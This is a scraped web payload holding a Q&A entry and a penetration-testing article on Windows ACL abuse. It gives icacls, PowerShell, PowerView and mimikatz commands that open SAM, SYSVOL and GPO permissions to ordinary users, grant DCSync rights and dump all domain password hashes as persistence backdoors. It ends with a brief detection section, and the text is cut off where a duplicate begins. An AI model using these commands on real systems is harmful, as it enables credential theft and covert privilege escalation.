[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fSQEWc06EZazRt4nzRnDADzuOGs3O1Ww1zmmECq7IbJ0":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},186,"How can an attacker use ACL modification for local privilege escalation backdoor?","After gaining administrator privileges, an attacker can modify the ACL of system directories (e.g., using icacls or PowerShell) to grant full control to a regular user. This enables the regular user to exploit techniques like DLL hijacking or file replacement for privilege escalation. This scenario is covered in the exploitation section of the [ACL article](\u002Fnews\u002Fpenetration-techniques-access-control-list-in-windows).","\u003Cp>After gaining administrator privileges, an attacker can modify the ACL of system directories (e.g., using icacls or PowerShell) to grant full control to a regular user. This enables the regular user to exploit techniques like DLL hijacking or file replacement for privilege escalation. This scenario is covered in the exploitation section of the [ACL article](\u002Fnews\u002Fpenetration-techniques-access-control-list-in-windows).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-access-control-list-in-windows\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-use-acl-modification-for-local-privilege-escalation-backdoor-1777484831036","privilege escalation, backdoor, ACL, DLL hijacking, icacls",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},48,"Penetration Techniques - Access Control List in Windows","penetration-techniques-access-control-list-in-windows","Learn Windows ACL exploitation for penetration testing, including privilege escalation, backdoor techniques, and defensive detection using icacls and PowerShell.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>ACL (Access Control List) in Windows systems is used to represent a list of user (group) permissions.\u003C\u002Fp>\u003Cp>In penetration testing, understanding and utilizing ACL, especially in backdoor exploitation (privilege escalation), offers significant room for application.\u003C\u002Fp>\u003Cp>From a defensive perspective, if a system is compromised, finding and removing ACL backdoors left by attackers also requires a certain understanding of ACL.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>ACL-related concepts\u003C\u002Fli>\u003Cli>Viewing ACL\u003C\u002Fli>\u003Cli>ACL exploitation (files, registry, and domain environments)\u003C\u002Fli>\u003Cli>ACL detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 ACL-related concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fdesktop\u002FSecAuthZ\u002Faccess-control-lists\u003C\u002Fp>\u003Ch4>ACL:\u003C\u002Fh4>\u003Cp>Access Control List, a list used to represent user (group) permissions, including DACL and SACL\u003C\u002Fp>\u003Ch4>ACE:\u003C\u002Fh4>\u003Cp>Access Control Entry, an element within an ACL\u003C\u002Fp>\u003Ch4>DACL:\u003C\u002Fh4>\u003Cp>Discretionary Access Control List, a list used to represent permissions for a security object\u003C\u002Fp>\u003Ch4>SACL:\u003C\u002Fh4>\u003Cp>System Access Control List, used to log access to a security object\u003C\u002Fp>\u003Ch4>Intuitive understanding:\u003C\u002Fh4>\u003Cp>ACLs are used in the Windows access control model, such as permissions for files and registries, to indicate which users (groups) have operational permissions\u003C\u002Fp>\u003Cp>For example, when accessing a file, the system will make the following judgments:\u003C\u002Fp>\u003Cul>\u003Cli>If there is no DACL, the system will allow access\u003C\u002Fli>\u003Cli>If a DACL exists but has no ACEs, the system will deny all access\u003C\u002Fli>\u003Cli>If a DACL exists and ACEs are present, each ACE specifies either allow or deny permissions.\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Example demonstration\u003C\u002Fh3>\u003Cp>For the folder C:\\Windows\\SYSVOL\\sysvol\\test.com, view folder properties\u003C\u002Fp>\u003Cp>By default, there are five DACLs, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019792499_0_b63f250865.jpeg\">\u003C\u002Fp>\u003Cp>Select one DACL, which contains multiple ACEs, indicating the permissions granted, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019800895_1_a9db3ccfbf.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 ACLs in files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Common commands (icacls):\u003C\u002Fh3>\u003Ch4>1. View the ACL of a specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019814348_2_56d0ddb9c7.jpeg\">\u003C\u002Fp>\u003Ch4>2. Back up the ACL of a specified file (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fsave AclFile \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Restore ACL for specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\ \u002Frestore AclFile \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When restoring, the path needs to be set to the parent directory\u003C\u002Fp>\u003Ch4>4. Add full access permissions for user test1 to specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fgrant test1:(OI)(CI)(F) \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>(OI) stands for Object Inherit\u003C\u002Fp>\u003Cp>(CI) stands for Container Inherit\u003C\u002Fp>\u003Cp>(F) stands for Full Access\u003C\u002Fp>\u003Ch4>5. Remove full access permissions for user test1 from specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fremove test1 \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Ch4>1. View ACL for a specified path\u003C\u002Fh4>\u003Cp>For example, C:\\Windows\\SYSVOL\\sysvol\\test.com\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'| Format-Table -wrap\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Add full access permissions for user test1 to the specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Add-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.AddAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Add-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Remove user test1's full access permissions to the specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Remove-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.RemoveAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Remove-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Add full access permissions for user test1 to the specified file (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Add-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.AddAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Add-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003Cbr>$fileList = Get-ChildItem 'C:\\Windows\\SYSVOL\\sysvol\\test.com' -recurse\u003Cbr>Foreach($file in $fileList)\u003Cbr>{\u003Cbr>    $file.fullname\u003Cbr>    Add-ACL -Path $file.fullname\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>5. Remove user test1's full access permissions to specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Remove-ACL{\u003Cbr>    [CmdletBinding()]\u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.RemoveAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Remove-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003Cbr>$fileList = Get-ChildItem 'C:\\Windows\\SYSVOL\\sysvol\\test.com' -recurse\u003Cbr>Foreach($file in $fileList)\u003Cbr>{\u003Cbr>    Remove-ACL -Path $file.fullname\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation Approach:\u003C\u002Fh3>\u003Ch4>1. Local Privilege Escalation Backdoor\u003C\u002Fh4>\u003Cp>After obtaining administrator privileges on a Windows system, modify the ACL of system directories to grant full access to regular users, creating a privilege escalation backdoor.\u003C\u002Fp>\u003Cp>Subsequently, elevate from a regular user to administrator privileges through various methods such as DLL hijacking or file replacement.\u003C\u002Fp>\u003Ch4>2. Modification of GPO in Domain Environment\u003C\u002Fh4>\u003Cp>Modify the ACL of the domain shared folder \\\\\u003Cdomain>\\SYSVOL\\\u003Cdomain>\\ to grant full access to regular users.\u003C\u002Fdomain>\u003C\u002Fdomain>\u003C\u002Fp>\u003Cp>Subsequently, use the privileges of a regular domain user to modify the domain's GPO, alter scheduled tasks within the GPO, and achieve remote execution of scheduled tasks.\u003C\u002Fp>\u003Cp>For related methods, refer to the previous article 'Domain Penetration – Remote Execution via Scheduled Tasks in GPO'.\u003C\u002Fp>\u003Ch4>3. Domain ordinary user reads all user hashes within the domain\u003C\u002Fh4>\u003Cp>Create file sharing for ntds.dit, add ACL\u003C\u002Fp>\u003Cp>Subsequently, domain ordinary users can access the domain controller's ntds.dit file to read all user hashes within the domain\u003C\u002Fp>\u003Ch2>0x04 ACL in the Registry\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Ch4>1. View ACL for a specified path\u003C\u002Fh4>\u003Cp>e.g., HKEY_LOCAL_MACHINE\\SAM\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path 'HKLM:\\SAM' | Format-Table -wrap\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019825851_3_5509259ae4.jpeg\">\u003C\u002Fp>\u003Cp>Obtain specific content of the Access item:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl -Path 'HKLM:\\SAM'\u003Cbr>$acl.Access\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019837440_4_cd1dbf9e34.jpeg\">\u003C\u002Fp>\u003Ch4>2. Grant user test1 full access to the specified path (including the current registry key and its subkeys)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:\\SAM\u003Cbr>$person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.AddAccessRule($rule)\u003Cbr>Set-Acl HKLM:\\SAM $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\" indicates that subkeys inherit permissions from the current registry key\u003C\u002Fp>\u003Cp>Modifying the ACL of registry key HKLM:\\SAM requires Administrator privileges\u003C\u002Fp>\u003Cp>Modifying the ACL of the registry key HKLM:\\SAM\\SAM requires System privileges\u003C\u002Fp>\u003Ch4>3. Remove the full access permission of user test1 to the specified path (including the current registry key and its subkeys)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:\\SAM\u003Cbr>$person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.RemoveAccessRule($rule)\u003Cbr>Set-Acl HKLM:\\SAM $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation approach:\u003C\u002Fh3>\u003Ch4>1. Local privilege escalation backdoor\u003C\u002Fh4>\u003Cp>Modify the registry keys HKLM:\\SAM and HKLM:\\SYSTEM to add full access permissions for ordinary users\u003C\u002Fp>\u003Cp>Ordinary users can obtain the hashes of all local users through registry entries, thereby gaining administrator privileges\u003C\u002Fp>\u003Ch4>3. Local Auto-start Backdoor\u003C\u002Fh4>\u003Cp>Modify registry locations to add startup items or hijack entries\u003C\u002Fp>\u003Ch2>0x05 ACL in Domain Environment\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Implemented through Active Directory Service Interfaces (ADSI)\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fdesktop\u002FAD\u002Fcontrolling-access-to-objects-in-active-directory-domain-services\u003C\u002Fp>\u003Cp>Reference for calling ADSI with PowerShell:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsocial.technet.microsoft.com\u002FForums\u002Fwindowsserver\u002Fen-US\u002Fdf3bfd33-c070-4a9c-be98-c4da6e591a0a\u002Fforum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell\u003C\u002Fp>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerView has already implemented this part, so this section directly references the functionality in PowerView\u003C\u002Fp>\u003Cp>Code repository:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Ch4>1. Obtain all objects in the current domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainObject -Domain test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Obtain the ACLs of all objects in the current domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainObjectAcl -Domain test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Obtain the ACL of a specified user\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainUser test1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Add full access permissions for user test1 to a specified object (guid)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity '483e9973-2d45-4e2f-b034-f272a26950e0' -PrincipalIdentity test1 -Rights All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>5. Remove full access permissions for user test1 to a specified object (guid)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity '483e9973-2d45-4e2f-b034-f272a26950e0' -PrincipalIdentity test1 -Rights All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation Approach:\u003C\u002Fh3>\u003Ch4>1. DCSync Backdoor\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method is learned from: https:\u002F\u002Fwww.specterops.io\u002Fassets\u002Fresources\u002Fan_ace_up_the_sleeve.pdf\u003C\u002Fp>\u003Cp>DCSync is a feature of mimikatz that can simulate a domain controller and export account password hashes from the domain controller\u003C\u002Fp>\u003Cp>If we obtain domain administrator privileges on a host within the domain, we can use the following command to directly export the hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export the hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, only Domain Controllers and Enterprise Domain Admins have the permissions to use DCSync.\u003C\u002Fp>\u003Cp>However, we can add ACLs to DS-Replication-GetChanges (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2), enabling ordinary users to invoke DCSync and export the hashes of all users in the domain.\u003C\u002Fp>\u003Cp>Implementation code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1#L8270\u003C\u002Fp>\u003Cp>The command to add the ACL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Next, on a host within the domain where the test1 user is logged in, we can use the DCSync feature of mimikatz.\u003C\u002Fp>\u003Cp>The command to remove the ACL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. GPO Backdoor\u003C\u002Fh4>\u003Cp>(1) View the GPOs in the current domain\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module GroupPolicy\u003Cbr>Get-GPO -All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below, TestGPO is one I added myself in the test environment, while Default Domain Policy and Default Domain Controllers Policy are GPOs that exist by default in the domain environment\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019858190_5_62de6f01db.jpeg\">\u003C\u002Fp>\u003Cp>(2) Add full access permissions for user test1 to TestGPO\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$RawObject = Get-DomainGPO -Raw -Identity 'TestGPO'\u003Cbr>$TargetObject = $RawObject.GetDirectoryEntry()\u003Cbr>$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity test1 -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty\u003Cbr>$TargetObject.PsBase.ObjectSecurity.AddAccessRule($ACE)\u003Cbr>$TargetObject.PsBase.CommitChanges()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Remove full access permissions for user test1 to TestGPO\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$RawObject = Get-DomainGPO -Raw -Identity 'TestGPO'\u003Cbr>$TargetObject = $RawObject.GetDirectoryEntry()\u003Cbr>$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity test1 -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty\u003Cbr>$TargetObject.PsBase.ObjectSecurity.RemoveAccessRule($ACE)\u003Cbr>$TargetObject.PsBase.CommitChanges()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Subsequent operations can be performed on GPOs to add scheduled tasks, enabling remote execution of scheduled tasks. For specific methods, refer to the previous article 'Domain Penetration - Utilizing Scheduled Tasks in GPOs for Remote Execution'.\u003C\u002Fp>\u003Ch2>0x06 ACL Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>1. Files and Registry\u003C\u002Fh4>\u003Cp>Open-source tools such as WindowsDACLEnumProject can be utilized:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnccgroup\u002FWindowsDACLEnumProject\u003C\u002Fp>\u003Cp>Capable of listing risky ACLs.\u003C\u002Fp>\u003Ch4>3. Domain Environment\u003C\u002Fh4>\u003Cp>Advanced security audit policies need to be enabled. Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblogs.technet.microsoft.com\u002Fcanitpro\u002F2017\u002F03\u002F29\u002Fstep-by-step-enabling-advanced-security-audit-policy-via-ds-access\u002F\u003C\u002Fp>\u003Cp>After enabling the policy, Event ID 5136 will record ACL modifications in the domain environment. Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.ultimatewindowssecurity.com\u002Fsecuritylog\u002Fencyclopedia\u002Fevent.aspx?eventid=5136\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces techniques for exploiting ACLs in Windows systems for backdoor purposes in file systems, registry, and domain environments, along with suggestions for detecting such backdoors.\u003C\u002Fp>\u003Cp>I have learned a lot about ACLs in domain environments from PowerView and would like to thank the author for open-sourcing it.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>ACL (Access Control List) in Windows systems is used to represent a list of user (group) permissions.\u003C\u002Fp>\u003Cp>In penetration testing, understanding and utilizing ACL, especially in backdoor exploitation (privilege escalation), offers significant room for application.\u003C\u002Fp>\u003Cp>From a 